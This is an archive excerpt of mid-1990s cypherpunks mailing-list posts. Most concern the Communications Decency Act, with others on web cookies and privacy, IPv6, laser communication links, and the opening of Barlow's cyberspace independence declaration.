   using indecent four-letter words, or discussing material deemed to
   be indecent, on electronic bulletin boards or Internet chat areas
   and news groups accessible to children.

   Let me give a couple of examples: You send E-mail back and forth,
   and you want to annoy somebody whom you talked with many times
   before -- it may be your best buddy -- and you use a four-letter
   word. Well, you could be prosecuted for that, although you could
   pick up the phone, say the same thing to him, and you commit no
   crime; or send a letter and say the same word and commit no crime;
   or talk to him walking down the street and commit no crime.

   To avoid liability under this legislation, users of e-mail will
   have to ban curse words and other expressions that might be
   characterized as indecent from their online vocabulary.

   The new law will punish with 2-year jail terms someone using one of
   the "seven dirty words" in a message to a minor or for sharing with
   a minor material containing indecent passages. In some areas of the
   country, a copy of Seventeen Magazine would be considered indecent,
   even though kids buy it. The magazine is among the 10 most
   frequently challenged school library materials in the country.
   Somebody sends an excerpt from it, and bang, they could be
   prosecuted.

   The new law will make it a crime "to display in a manner available
   to" a child any message or material "that, in context, depicts or
   describes, in terms patently offensive as measured by contemporary
   community standards, sexual or excretory activities or organs..."
   That covers any of the over 13,000 Usenet discussion groups, as
   well as electronic bulletin boards, online service provider chat
   rooms, and Web sites, that are all accessible to children.

   This "display" prohibition, according to the drafters, "applies to
   content providers who post indecent material for online display
   without taking precautions that shield that material from minors."

   What precautions will Internet users have to take to avoid criminal
   liability? These users, after all, are the ones who provide the
   "content" read in news groups and on electronic bulletin boards.
   The legislation gives the FCC authority to describe the precautions
   that can be taken to avoid criminal liability. All Internet users
   will have to wait and look to the FCC for what they must do to
   protect themselves from criminal liability.

   Internet users will have to limit all language used and topics
   discussed in online discussions accessible to minors to that
   appropriate for kindergartners, just in case a child clicks onto
   the discussion. No literary quotes from racy parts of Catcher in
   the Rye or Ulysses will be allowed. Certainly, online discussions
   of safe sex practices, or birth control methods, and of AIDS
   prevention methods will be suspect. Any user who crosses the vague
   and undefined line of "indecency" will be subject to two years in
   jail and fines.

   This worries me considerably. I will give you an idea of what
   happens. People look at this, and because it is so vague and so
   broad and so sweeping, attempts to protect one's self from breaking
   the law become even broader and even more sweeping.

   A few weeks ago, America Online took the online profile of a
   Vermonter off the service. Why? Because the Vermonter used what AOL
   deemed a vulgar, forbidden word. The word -- and I do not want to
   shock my colleagues -- but the word was "breast." And the reason
   this Vermonter was using the word "breast"? She was a survivor of
   breast cancer. She used the service to exchange the latest
   information on detection of breast cancer or engage in support to
   those who are survivors of breast cancer. Of course, eventually,
   America Online apologized and indicated they would allow the use of
   the word where appropriate.

   We are already seeing premonitions of the chilling effect this
   legislation will have on online service providers. Far better we
   use the laws on the books today to go after child pornographers, to
   go after child abusers.

   What strikes some people as "indecent" or "patently offensive" may
   look very different to other people in another part of the country.
   Given these differences, a vague ban on patently offensive and
   indecent communications may make us feel good but threatens to
   drive off the Internet and computer networks an unimaginable amount
   of valuable political, artistic, scientific, health and other
   speech.

   For example, many museums in this country and abroad are going
   hi-tech and starting Web pages to provide the public with greater
   access to the cultural riches they offer. What if museums, like the
   Whitney Museum, which currently operates a Web page, had to censor
   what it made available online out of fear of being dragged into
   court? Only adults and kids who can make it in person to the museum
   will be able to see the paintings or sculpture censored for online
   viewing under this law.

   What about the university health service that posts information
   online about birth control and protections against the spread of
   AIDS? With many students in college under 18, this information
   would likely disappear under threat of prosecution.

   What happens if they are selling online versions of James Joyce's
   Ulysses or of Catcher in the Rye? Can they advertise this? Can
   excerpts be put online? In all likelihood not. The Internet is
   breaking new ground important for the economic health of this
   country. Businesses, like the Golden Quill Book Shop in Manchester
   Center, Vermont can advertise and sell their books around the
   country or the world via the Internet. But now, advertisers will
   have to censor their ads.

   For example, some people consider the Victoria's Secret catalogue
   indecent. Under this new law, advertisements that would be legal in
   print could subject the advertiser to criminal liability if
   circulated online. You could put them in your local newspaper, but
   you cannot put it online.

   In bookstores and on library shelves, the protections of the First
   Amendment are clear. The courts are unwavering in the protection of
   indecent speech. In altering the protections of the first amendment
   for online communications, I believe you could cripple this new
   mode of communication.

   At some point you have to start asking, where do we censor? What
   speech do we keep off? Is it speech we may find politically
   disturbing? If somebody wants to be critical of any one Member of
   Congress, are we able to keep that off? Should we be able to keep
   that off? I think not. There is a lot of reprehensible speech and
   usually it becomes more noted when attempts are made to censor it
   rather than let it out in the daylight where people can respond to
   it.

   The Internet is an American technology that has swept around the
   world. As its popularity has grown, so have efforts to censor it.
   For example, complaints by German prosecutors prompted an online
   service provider to cut off subscriber access to over 200 Internet
   news groups with the words "sex", "gay" or "erotica" in the name.
   They censored such groups as "clarinet.news.gays," which is an
   online newspaper focused on gay issues, and "gay-net.coming-out",
   which is a support group for gay men and women dealing with going
   public with their sexual orientation.

   German prosecutors have also tried to get AOL to stop providing
   access to neo-Nazi propaganda accessible on the Internet. No doubt
   such material is offensive and abhorrent, but nonetheless just as
   protected by our First Amendment as indecent material.

   In China, look what they are trying to do. They are trying to
   create an "intranet" that would heavily censor outside access to
   the worldwide Internet. We ought to be make sure it is open, not
   censored. We ought to send that out as an example to China.

   Americans should be taking the high ground to protect the future of
   our home-grown Internet, and to fight these censorship efforts that
   are springing up around the globe. Instead of championing the First
   Amendment, however, the Communications Decency Act tramples on the
   principles of free speech and free flow of information that has
   fueled the growth of this medium.

   We have to be vigilant in enforcing the laws we have on the books
   to protect our children from obscenity, child pornography and
   sexual exploitation. Those laws are being enforced. Just last
   September, using current laws, the FBI seized computers and
   computer files from about 125 homes and offices across the country
   as part of an operation to shut down an online child pornography
   ring.

   I well understand the motivation for the Communications Decency
   Act. We want to protect our children from offensive or indecent
   online materials. This Senator --and I am confident every other
   Senator-- agrees with that. But we must be careful that the means
   we use to protect our children does not do more harm than good. We
   can already control the access our children have to indecent
   material with blocking technologies available for free from some
   online service providers and for a relatively low cost from
   software manufacturers.

   Frankly, and I will close with this, Mr. President, at some point
   we ought to stop saying the Government is going to make a
   determination of what we read and see, the Government will
   determine what our children have or do not have.

   I grew up in a family where my parents thought it was their
   responsibility to guide what I read or would not read. They
   probably had their hands full. I was reading at the age of 4. I was
   a voracious reader, and all the time I was growing up I read
   several books a week and went through our local library in the
   small town I grew up in very quickly. That love of reading has
   stood me in very good stead. I am sure I read some things that were
   a total waste of time, but very quickly I began to determine what
   were the good things to read and what were the bad things. I had
   read all of Dickens by the end of the third grade and much of
   Robert Louis Stevenson. I am sure some can argue there are parts of
   those that maybe were not suitable for somebody in third grade. I
   do not think I was severely damaged by it at all. That same love of
   reading helped me get through law school and become a prosecutor
   where I did put child abusers behind bars.

   Should we not say that the parents ought to make this decision, not
   us in the Congress? We should put some responsibility back on
   families, on parents. They have the software available that they
   can determine what their children are looking at. That is what we
   should do. Banning indecent material from the Internet is like
   using a meat cleaver to deal with the problems better addressed
   with a scalpel.

   We should not wait for the courts. Let us get this new
   unconstitutional law off the books as soon as possible.

    ##
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Thu, 15 Feb 1996 18:35:03 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602121313.IAA26828@UNiX.asb.com>
Message-ID: <199602141541.JAA18088@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


"Declan B. McCullagh" <declan+@CMU.EDU> said:

DBM> (I assume your Bible argument is just posturing. No
DBM> U.S. Attorney, political appointees they, ever will prosecute
DBM> someone who puts the complete text of the King James Bible
DBM> online.)

	You assume wrong.  While I certainly agree that no
U.S. Attorney would voluntarily prosecute such a case, what happens
when an athiest files charges against someone for carrying the Bible?
IANAL, but couldn't the U.S. Attorney be forced to prosecute?
Apparently I'm not the only one who thinks so, since it has been
reported (on this list by Tim Philp from a Toronto Star article) that
the Bible has been removed from at least one Web site, presumably due
to fear of prosecution.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutant Rob)
Date: Thu, 15 Feb 1996 20:55:19 +0800
To: cypherpunks@toad.com
Subject: Mouse pad???
Message-ID: <199602141500.KAA03032@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I got a mouse pad in the mail today, mailed in
> Maryland, but otherwise in a plain brown envelope.
> It has nice, understated gold seal announcing it
> is from the National Security Agency's Information
> Systems Security Organization.

Ah. But don't you see... it's got a hidden transmitter there. It 
monitors your mouse movements and can sense keyboard timings, disk 
access and uses a mini-TEMPEST device to moniter your screen...


<G>

(I love it when there's a slew of untitled "owner-cypherpunks" 
messages... does a job on filtering software...)

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSH5FCoZzwIn1bdtAQGlKAF/RzgodmykMrgha9IFUYsFuxN0F+UggGeV
dtGjjovfZ7FXz5UC8T4DNq9ZOvbFfsP5
=P5gF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 15 Feb 1996 17:04:00 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks
In-Reply-To: <2.2.32.19960214070150.00af2350@mail.teleport.com>
Message-ID: <199602141509.KAA25060@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alan Olsen wrote:

| >	Addresses will not be easily 'transferable.'  The IETF is
| >discussing a 'Best Current Practices' document that talks about
| >address portability.  Basically, it can't happen, because the routers
| >only have so much memory, and the routers at the core of the internet
| >can't keep in memory how to reach every one; there needs to be
| >aggregation.  The only feasible aggregation seems to be provider
| >based, ie, MCI, Alternet, and other large ISPs get blocks of
| >addresses.  They give them to smaller companies, like got.net, which
| >gives them to customers.  The result?  The core routers have a few
| >more years.
| 
| A good point. Having parts of subnet shifting around could be pretty painful
| from an admin point of view.

Its not an admin's point of view thats worrisome.  Whats worrisome is
that the routers at the core of the net only have so much memory, and
if the routing tables grow beyond that, we're all hosed, becuase the
core of the internet will start thrashing.  So, in essense, you taking
your network address with you when you switch providers ('address
portability' causes costs that must be borne by the entire global
internet.


| What is the timeline for implementation of IPv6?

	Good question.  I think the address allocation just went to
last call, which means that we should have a policy for getting IPv6
addresses pretty soon.  After that, you need to wait for your router
vendor to announce an IPv6 capable version.  I'd guess it will be six
to eighteen months before you can call Netcom and ask for an IPv6 PPP
connection.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 15 Feb 1996 19:28:06 +0800
To: accessnt@ozemail.com.au (Mark Neely)
Subject: Re: Off topic - research query
In-Reply-To: <199602140649.RAA14008@oznet02.ozemail.com.au>
Message-ID: <199602141518.KAA25093@homeport.org>
MIME-Version: 1.0
Content-Type: text


Mark Neely wrote:

| As a side issue, I wanted to cover the "overhead"
| factor inherent in the TCP/IP (v4?) protocol 
| which I understand is reduced under the proposed IPv.6 protocol.

	Comer is the best text on IP, his third edition talks about
IPv6 as well as v4.  Essentally, there was a some unneeded stuff in
IPv4 headers, which routers had to look at.  The IPv6 headers are much
cleaner.

| I'd also like to discuss the "unfriendly" manner in which
| web browsers such as Netscape hog resources by sending multiple
| port access requests.

	Our own Simon Spero has a paper entitled something like
'Optimizations for HTTP.'  Its on the w3.org web server.

	Speaking of HTTP-ng, I was thinking the other day about a
scheme for further optimization.  It only works in the presense of
dnssec, which is moving forward.

	When getting a URL, add a meta tag, which gives the web
server's idea of what the referenced hosts IP address (or its primary
NS) is.  This could be a win because we need fewer calls to the root
name servers.  Those calls tend to be short, (1 or 2 udp packets each
way), which need to be routed in a way that few other packets would
need to be.  By eliminating them, we push all of the traffic regarding
a web host to its network.

	This only works under DNSsec because otherwise I could say
http://www.microsoft.com/ meta-dns-A=140.174.1.3

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Feb 1996 15:42:15 +0800
To: olbon@dynetics.com (Clay Olbon II)
Subject: Re: Linux on the Mac
In-Reply-To: <v01540b05ad47941dd32c@[193.239.225.200]>
Message-ID: <199602141521.KAA24196@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Clay Olbon II writes:
> In the latest PowerPC news it is reported that OSF is porting Linux to the
> Mac with the support of Apple.  Apple has a web site -
> www.mklinux.apple.com that discusses this and has a link to the OSF site.
> In my book, this is a GoodThing(tm).  Of course, being a huge fan of both
> the Mac and unix might put me in the minority ;-)

I hate to ask this, but why does this have an impact on cryptography?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 15 Feb 1996 19:02:10 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: Netscrape's Cookies
In-Reply-To: <2.2.32.19960214024957.0076a27c@mail.teleport.com>
Message-ID: <199602141634.KAA10099@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> >>I'm curious if anyone knows which sites use/modify it.
> >AFAIK, the only site that uses it is *.netscape.com
> 
> That is not quite true.  There are other sites that use the cookies.  (It is
> not very common though...)

A good place to read about cookies is http://www.illuminatus.com/cookie;  
I think there are pointers to cgi/perl stuff that manipulates them.

Cookies are very helpful for database and commerce applications.  I'm 
using them for a crude online store, as a way to let the web server keep 
track of who has what in their shopping basket.  Another way to solve the 
same problem (letting the server store state information) is to put data 
in the urls.  (ie., when you sign in, you get a page back that's 
generated on the fly, and all the links in that page have a session id 
embedded in the urls.)

Preserving state information is useful, and as it's been pointed out here,
the cookie only contains information that came from the web server in the
first place -- I don't see coookies as a major threat to privacy.  You
could even argue the other side (somewhat unconvincingly), that cookies
let you put more applications under the netscape/ssl umbrella.  As the web
grows more robust, a secure web means having stuff like secure
communications between workstations and db servers, etc.  Cookies make it
easier to do db applications. 

But in general, I'd like to see netscape adopt a system that lets people
know when information is going to be transmitted to a remote site.  It's
easy to grab someone's email address by seting up a form with only hidden
fields and trick people into submitting it by mail by clicking on a
button.  The ftp problem has been discussed here before, and addressed by 
Netscape.

The best answer would probably be to use the kind of pop-up messages you 
get when you're going to submit a secure or insecure form.  "You're about 
to send a cookie back to a web server, continue or abandon?"  "You're 
about to send mail from a web page, do you want to do that?"  Give people 
the ability to turn the messages off -- that way functionality isn't 
impaired.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Fri, 16 Feb 1996 05:40:06 +0800
To: michaelm@silcom.com (Michael Masterson)
Subject: Re: Using lasers to communicate
In-Reply-To: <ad1165bc0602100487b8@[205.199.118.202]>
Message-ID: <dHgIxMz2BcTM083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


This idea of sending data via laser beams across open spaces has some
very useful potential.  I want to suggest some motivation and some
enhancement.  [quotes below give a little background, from the list]

Eavesdropping and channel-blocking and physical-location-discovery are 
related threats to which most traditional data channels are susceptible.  
Any link which depends on a physical conduit (phone line, fiber, coax)
is relatively easy to interrupt and to trace to its end points.
RF links, even with frequency hopping, are subject to triangulation and
jamming.  All these kinds of links can be eavesdropped.

Point-to-point conduitless laser signalling, as envisioned by "Bill" and
Tim in their quotes below, eliminates or reduces these threats. 
Now consider an enhancement.  In show business, we sometimes entertain
the folks with "laser light shows".  The technology used is fairly
straightforward, mainly involving the use of mirrors (the effect also uses
smoke ususally, but please don't prematurely dismiss my remarks on this
basis).  The laser source is attached to a "laser table" which holds a 
number of small mirrors which may be individually inserted (via fast
solenoids) into the path of the laser beam.  Each of these mirrors is then
calibrated to aim at a particular place in the theatre, usually another
larger mirror.  Then (under computer control) the various small mirrors
on the laser table are rapidly inserted and withdrawn from the light beam,
causing the laser beam to follow first one path, then another, then another
through the (smoky) air -- all to the delight of the audience.

This technology could easily be adapted to make a communication channel
safer from the various threats of eavesdropping, interruption, and tracing.
A single point-to-point channel could be made to follow various paths 
having common elements only VERY close to the endpoints.  Better still,
a network of more than two nodes could be constructed without needing to
provide multiple transceivers at each node (and with possibly multiple 
beam paths between each pair).  With known methods of routing and
collision avoidance, we could thus not only route around any known opposition
but also make it very expensive to eavesdrop or even to discover that 
a signal exists.  ("Honey, call the EPA again -- those gubmint boys are back,
driving their oil-burning old van around Mr. May's house.").

[previous attribution unknown...:]
} >>With a tightly focused beam (light is easy, I don't know about lower
} >>frequencies), you can prevent interception except by very obvious physical
} >>devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
} >>avoid the need to encrypt the link (and all the paranoia about key
} >>management, advances in factoring etc. that that implies.)
} >>
} >>Bill

On Thu, 4 Jan 1996 12:45:15 -0800, tcmay@got.net (Timothy C. May) wrote:
} 
} Just a couple of points on this optical idea.
} 
} We were linking buildings a mile apart in the 70s, at Intel. We needed to
} ship CAD data back and forth, and PacBell rates for a dedicated line were
} outrageous, slow to be installed, etc. So, a commercially available laser
} and modulator/demodulator (modem, but it bears sometimes using the longer
} version, to remind people of what it is doing in general) were mounted on
} the roofs of our buildings. I'm sure various packages are commercially
} available to do this.
[snip] 
} I'm actually more positive on low-level (below safety regs get interested
} in) light than on free space RF, for bypassing of the local cable/phone
} monopolies. There's just not enough "bandwidth of free space" available. Do
} the math.
[snip]


::::::::::::::::::::::::::::::::::::::
::  Lou Poppler <lwp@mail.msen.com> ::  " The more you drive, 
::      http://www.msen.com/~lwp/   ::    the less intelligent you are."
::::::::::::::::::::::::::::::::::::::    -- Repo man




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 15 Feb 1996 13:07:03 +0800
To: Whatever the hell anybody wants to talk aboutPUNKS <cypherpunks@toad.com>
Subject: Re: Subject lines?
In-Reply-To: <v01540b03ad4792ab7c21@[193.239.225.200]>
Message-ID: <Pine.ULT.3.91.960214102255.16136C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Me too! It has happened a few times before. Actually, all headers save 
Sender: are being trashed.

I'd thought it was an interaction problem with deliver, our local MTA. 
Or maybe it is, if you use deliver too. Please share experiences *in 
private email*.

The messages on news://nntp.hks.net/hks.lists.cypherpunks do have subject 
lines, so at least some messages are leaving toad.com OK. I think it's 
our problem.

-rich

On Wed, 14 Feb 1996, Clay Olbon II wrote:

> Ok, has everyone forgotten to use a subject line today, or is there a
> problem with toad.com?  Every message I received today that was dated 14
> Feb (except one - from "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>)
> had no subject and no from line (other than cypherpunks).  This includes
> messages from Perry and Jim Bell.
> 
>         Clay
> 
> ---------------------------------------------------------------------------
> Clay Olbon II            | olbon@dynetics.com
> Systems Engineer         | ph: (810) 589-9930 fax 9934
> Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
> 550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
> Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
>     "To escape the evil curse, you must quote a bible verse; thou
>      shalt not ... Doooh" - Homer (Simpson, not the other one)
> ---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 15 Feb 1996 19:12:50 +0800
Subject: New discussion group "CDA96-L" = COMMUNICATIONS DECENCY ACT of 1996 (fwd)
Message-ID: <Pine.ULT.3.91.960214104721.4803F-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 13 Feb 96 22:49 PST
From: Gary Klein (bear-at-heart) <gklein@willamette.edu>
To: Neil Radford <N.Radford@library.usyd.edu.au>
Subject: New discussion group "CDA96-L" = COMMUNICATIONS DECENCY ACT of 1996 

     In light of the recent furor over the airwaves, in the media, and in 
lawsuits regarding the COMMUNICATIONS DECENCY ACT of 1996 that United 
States' President Clinton signed into law on February 8, 1996, I 
have created a forum for people to discuss the concerns raised by this 
(and similar) pieces of legislation.

LISTNAME:      CDA96-L
FULL TITLE:    Communications Decency Act of 1996 Discussion Group
FORMAT:        Un-moderated, Postings must come from registered subscribers
SUBSCRIPTIONS: via LISTPROC software
LISTOWNER:     Gary M. Klein <gklein@willamette.edu>
               Management & Business Economics Librarian
               Hatfield Library
               Willamette University
               Salem, Oregon  97301 USA

DESCRIPTION:   
     CDA96-L is open to the networkng community.  Its primary role is
to serve as a means of communication among people who are concerned
about the implications of the United States of America's COMMUNICATIONS
DECENCY ACT of 1996 (signed into law by President William J. Clinton
on February 8, 1996).  Its secondary role is to serve as a discussion
forum for similar legislation or regulation that may be in the formative
or final stages in any other country, or at any local jurisdiction that
would restrict, limit or inhibit use of Internet resources based on
"decency", "morality", "offensiveness", or based on the age of someone
using, operating, or accessing an Internet resource.

SUBSCRIBING TO THE "CDA96-L" LIST:
     Anyone may subscribe to the list by sending a <sub cda96-l your name>
command to <listproc@willamette.edu>

     For example, if Idi Amin wanted to subscribe, the post would be:
                  mailto:   listproc@willamette.edu
                    text:   sub cda96-l Idi Amin

OTHER LISTPROC COMMANDS:
     Will be supplied to each subscriber as part of the Welcome Message.

(please feel free to cross-post this announcement in appropriate places)

GARY M. KLEIN "not your average librarian & indecent communicator"
Hatfield Library / Willamette University / Salem, Oregon 97301 USA
work 503-370-6743 / gklein@willamette.edu














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 16 Feb 1996 17:44:07 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: New discussion group "CDA96-L" = COMMUNICATIONS DECENCY ACT of 1996 (fwd)
Message-ID: <199602151940.LAA08372@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 13 Feb 96 22:49 PST
From: Gary Klein (bear-at-heart) <gklein@willamette.edu>
To: Neil Radford <N.Radford@library.usyd.edu.au>
Subject: New discussion group "CDA96-L" = COMMUNICATIONS DECENCY ACT of 1996 

     In light of the recent furor over the airwaves, in the media, and in 
lawsuits regarding the COMMUNICATIONS DECENCY ACT of 1996 that United 
States' President Clinton signed into law on February 8, 1996, I 
have created a forum for people to discuss the concerns raised by this 
(and similar) pieces of legislation.

LISTNAME:      CDA96-L
FULL TITLE:    Communications Decency Act of 1996 Discussion Group
FORMAT:        Un-moderated, Postings must come from registered subscribers
SUBSCRIPTIONS: via LISTPROC software
LISTOWNER:     Gary M. Klein <gklein@willamette.edu>
               Management & Business Economics Librarian
               Hatfield Library
               Willamette University
               Salem, Oregon  97301 USA

DESCRIPTION:   
     CDA96-L is open to the networkng community.  Its primary role is
to serve as a means of communication among people who are concerned
about the implications of the United States of America's COMMUNICATIONS
DECENCY ACT of 1996 (signed into law by President William J. Clinton
on February 8, 1996).  Its secondary role is to serve as a discussion
forum for similar legislation or regulation that may be in the formative
or final stages in any other country, or at any local jurisdiction that
would restrict, limit or inhibit use of Internet resources based on
"decency", "morality", "offensiveness", or based on the age of someone
using, operating, or accessing an Internet resource.

SUBSCRIBING TO THE "CDA96-L" LIST:
     Anyone may subscribe to the list by sending a <sub cda96-l your name>
command to <listproc@willamette.edu>

     For example, if Idi Amin wanted to subscribe, the post would be:
                  mailto:   listproc@willamette.edu
                    text:   sub cda96-l Idi Amin

OTHER LISTPROC COMMANDS:
     Will be supplied to each subscriber as part of the Welcome Message.

(please feel free to cross-post this announcement in appropriate places)

GARY M. KLEIN "not your average librarian & indecent communicator"
Hatfield Library / Willamette University / Salem, Oregon 97301 USA
work 503-370-6743 / gklein@willamette.edu














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 15 Feb 1996 18:33:51 +0800
To: cypherpunks@toad.com
Subject: Cookie Crumbles
Message-ID: <199602141606.LAA27401@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Wall Street Journal, February 14, 1996, p. B6.


   Internet Users Say They'd Rather Not Share Their 'Cookies'

   By Joan E. Rigdon


   Netscape Communications Corp., responding to complaints
   from consumers, said it will change its Internet browser
   software so customers can prevent on-line merchants from
   tracking their footsteps in cyberspace.

   The ruckus began Monday, when the Financial Times reported
   on a little-known feature in Netscape software called
   Cookies. Cookies helps merchants on the Internet's
   multimedia World Wide Web track what customers do in their
   stores, and how long they spend doing it.

   Cookies stores this data on the customer's own hard drive,
   (in a text file called "Cookies.txt" in the Netscape
   directory) . The next time the customer visits the
   merchant's store, the merchant can read about the
   customer's last visit, and serve up a version of the store
   that's tailored for the customer.

   Cookies won't show merchants what other stores the customer
   has visited.

   Net surfers have complained on-line about the feature,
   saying it's an invasion of privacy and that it ties up the
   resources of their own computers.

   Netscape, the Mountain View, Calif., maker of the No. 1
   Internet browsing software, says it didn't think people
   might object to Cookies, since merchants can track a
   customer's footsteps even without Cookies, and few have
   complained about that. Product manager Jeff Treuhaft
   contends Cookies actually helps customers, because among
   other things, it allows customers to buy several things
   from different parts, or "pages," of an Internet store, and
   only pay once, instead of once at every page.

   Also, the Internet's standards board, called the Internet
   Engineering Task Force, has asked Netscape to propose
   Cookies as a standard for the Internet, Netscape said.

   Still, Netscape agreed to change the software. In future
   versions of Netscape, customers will have the choice of
   refusing to let a merchant lay down "a persistent Cookie,"
   Mr. Treuhaft says, referring to Cookies that track customer
   movements for days, weeks or months, instead of just a
   single Internet session, as most do. "We want to give the
   user as much control as possible," Mr. Treuhaft says.

   [End]


   Still, be alert for invasive snoops and tracking analytics,
   not only by NSCP, but by all those invaders crying mea 
culpa, 
   "you misjudge the goodness in our hearts, we did it for your
   own good, like all good parents. Trust us."












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 15 Feb 1996 17:56:51 +0800
To: cypherpunks@toad.com
Subject: MES_sag
Message-ID: <199602141626.LAA29322@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wash Post today has front page "Specialists Say Message
   Spotlights Issues of Power, Responsibility" on an alleged
   abuse of the Internet by a UMD student (and member of the
   Utopian Anarchist Party) who posted a message accusing a
   mother of mistreating a daughter, and asking readers to
   telephone the mother to protest -- which many did, causing
   mayhem in the harem.

   Stiff-necks say that the incident demonstrates the
   uncontrolled nature of the Net. "Computer experts said lack
   of accountability in Internet communication could expand
   with the use of anonymous remailers." Easy e-mail forgery
   is noted.

   MES_sag






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Fri, 16 Feb 1996 01:13:30 +0800
To: "'Cypherpunks Mailing List'" <cypherpunks@toad.com>
Subject: FW: Cyberspace Declaration Of Independence
Message-ID: <01BAFAD3.940E0460@loki>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Tue, 13 Feb 1996 20:53:34 -0500
From: janice <janice@mars.superlink.net>
To: janice@artsedge.kennedy-center.org
Newgroups: at.mail.com-priv
Subject: (fwd) A Declaration of Independence, for Cyberspace. (fwd)

Path: earth.superlink.net!news.sprintlink.net!europa.chnt.gtegsc.com!news.uoregon.edu!usenet.eel.ufl.edu!newsfeed.internetmci.com!howland.reston.ans.net!EU.net!Austria.EU.net!osiris.wu-wien.ac.at!news-mail-gateway
From: avalon@coombs.anu.edu.au (Darren Reed)
Newsgroups: at.mail.com-priv
Subject: A Declaration of Independence, for Cyberspace. (fwd)
Date: 12 Feb 1996 11:36:26 +0100
Organization: WU Mail/News Gateway
Lines: 173
Sender: daemon@osiris.wu-wien.ac.at
Message-ID: <199602121024.FAA25713@lists.psi.com>
NNTP-Posting-Host: osiris.wu-wien.ac.at


I haven't seen this on com-priv yet...but I may have deleted it without
noticing....(sorry if it has been through it already).

darren

>>> John Perry Barlow <barlow@eff.org> dared to speak the following <<<

From: John Perry Barlow <barlow@eff.org>
To: watts@hawaii.edu
Subject: A Cyberspace Independence Declaration

Yesterday, that great invertebrate in the White House signed into the law
the Telecom "Reform" Act of 1996, while Tipper Gore took digital
photographs of the proceedings to be included in a book called "24 Hours in
Cyberspace."

I had also been asked to participate in the creation of this book by
writing something appropriate to the moment. Given the atrocity that this
legislation would seek to inflict on the Net, I decided it was as good a
time as any to dump some tea in the virtual harbor.

After all, the Telecom "Reform" Act, passed in the Senate with only 5
dissenting votes, makes it unlawful, and punishable by a $250,000 to say
"shit" online. Or, for that matter, to say any of the other 7 dirty words
prohibited in broadcast media. Or to discuss abortion openly. Or to talk
about any bodily function in any but the most clinical terms.

It attempts to place more restrictive constraints on the conversation in
Cyberspace than presently exist in the Senate cafeteria, where I have dined
and heard colorful indecencies spoken by United States senators on every
occasion I did.

This bill was enacted upon us by people who haven't the slightest idea who
we are or where our conversation is being conducted. It is, as my good
friend and Wired Editor Louis Rossetto put it, as though "the illiterate
could tell you what to read."

Well, fuck them.

Or, more to the point, let us now take our leave of them. They have
declared war on Cyberspace. Let us show them how cunning, baffling, and
powerful we can be in our own defense.

I have written something (with characteristic grandiosity) that I hope will
become one of many means to this end. If you find it useful, I hope you
will pass it on as widely as possible. You can leave my name off it if you
like, because I don't care about the credit. I really don't.

